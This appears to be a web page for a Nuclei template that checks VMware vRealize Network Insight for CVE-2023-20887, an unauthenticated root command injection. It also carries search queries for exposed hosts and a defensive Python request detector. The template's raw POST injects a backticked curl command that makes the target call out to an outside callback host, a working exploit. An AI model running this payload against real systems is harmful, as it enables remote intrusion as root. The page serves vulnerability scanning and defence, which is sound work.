VMware VRealize Network Insight - Remote Code Execution
ID: CVE-2023-20887
Severity: critical
Author: sinsinology
Tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev
Description
VMware Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of ‘root’ on the appliance. VMware 6.x versions are vulnerable.
YAML Source
id: CVE-2023-20887

info:
  name: VMware VRealize Network Insight - Remote Code Execution
  author: sinsinology
  severity: critical
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are vulnerable.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches provided by VMware to mitigate this vulnerability.
  reference:
    - https://www.vmware.com/security/advisories/VMSA-2023-0012.html
    - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
    - https://github.com/sinsinology/CVE-2023-20887
    - http://packetstormsecurity.com/files/173761/VMWare-Aria-Operations-For-Networks-Remote-Command-Execution.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-20887
    cwe-id: CWE-77
    epss-score: 0.9635
    epss-percentile: 0.99552
    cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vmware
    product: vrealize_network_insight
    shodan-query:
      - title:"VMware vRealize Network Insight"
      - http.title:"vmware vrealize network insight"
      - http.title:"vmware aria operations"
    fofa-query:
      - title="VMware vRealize Network Insight"
      - title="vmware aria operations"
      - title="vmware vrealize network insight"
    google-query:
      - intitle:"vmware aria operations"
      - intitle:"vmware vrealize network insight"
  tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev

variables:
  cmd: "curl {{interactsh-url}}"

http:
  - raw:
      - |
        POST /saas./resttosaasservlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-thrift

        [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`{{cmd}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"rec":'

      - type: word
        part: header
        words:
          - "application/x-thrift"

      - type: word
        part: body
        negative: true
        words:
          - "Provided invalid node Id"
          - "Invalid nodeId"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d0c10c53567917e7d5cbcaa74a548f9f7ed2e52403b3f8346ca6abb2c3a36b300221008cfddef4eb28d8d6ce3947c61b87f0bca02d0a97c0263338ff83de9ee7b4cbd8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-20887.yaml"
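
A defender-side check for the request this template sends, as an added example that is not part of the template or of VMware's code: it parses a captured Thrift JSON-protocol body and flags shell metacharacters in `createSupportBundle` string arguments. The function names, the metacharacter set and the sample bodies are assumptions constructed for illustration.

```python
import json
import re

# Request path taken from the template above; the argument checks are assumptions.
TEMPLATE_PATH = "/saas./resttosaasservlet"
# Characters that let a string argument break out into a shell command.
SHELL_META = re.compile(r"[`$;|&<>\n]")


def iter_strings(value):
    """Yield every string value nested in a Thrift JSON-protocol struct or list."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for item in value.values():
            yield from iter_strings(item)
    elif isinstance(value, list):
        for item in value:
            yield from iter_strings(item)


def inspect_request(method, path, content_type, body):
    """Return findings for one captured HTTP request (hypothetical helper)."""
    findings = []
    if method != "POST" or "application/x-thrift" not in content_type.lower():
        return findings
    if path.split("?", 1)[0] == TEMPLATE_PATH:
        findings.append("thrift POST to " + TEMPLATE_PATH)
    try:
        msg = json.loads(body)
    except ValueError:
        return findings  # not the JSON protocol; nothing more to inspect
    # Thrift JSON message layout: [version, method name, type, seqid, args]
    if not (isinstance(msg, list) and len(msg) == 5 and isinstance(msg[1], str)):
        return findings
    if msg[1] == "createSupportBundle":
        for text in iter_strings(msg[4]):
            if SHELL_META.search(text):
                findings.append("shell metacharacter in argument: " + repr(text))
    return findings


# Constructed sample bodies, shaped like the template's request.
SUSPICIOUS = ('[1,"createSupportBundle",1,0,{"1":{"str":"1111"},'
              '"2":{"str":"`echo constructed`"},"3":{"str":"value3"},'
              '"4":{"lst":["str",2,"AAAA","BBBB"]}}]')
BENIGN = ('[1,"createSupportBundle",1,0,{"1":{"str":"1111"},'
          '"2":{"str":"node-01"},"3":{"str":"value3"},'
          '"4":{"lst":["str",2,"AAAA","BBBB"]}}]')

if __name__ == "__main__":
    for body in (SUSPICIOUS, BENIGN):
        print(inspect_request("POST", TEMPLATE_PATH, "application/x-thrift", body))
```

The path finding alone is worth alerting on when the request arrives from outside the appliance, since the description states the RPC interface is meant to sit behind the reverse proxy.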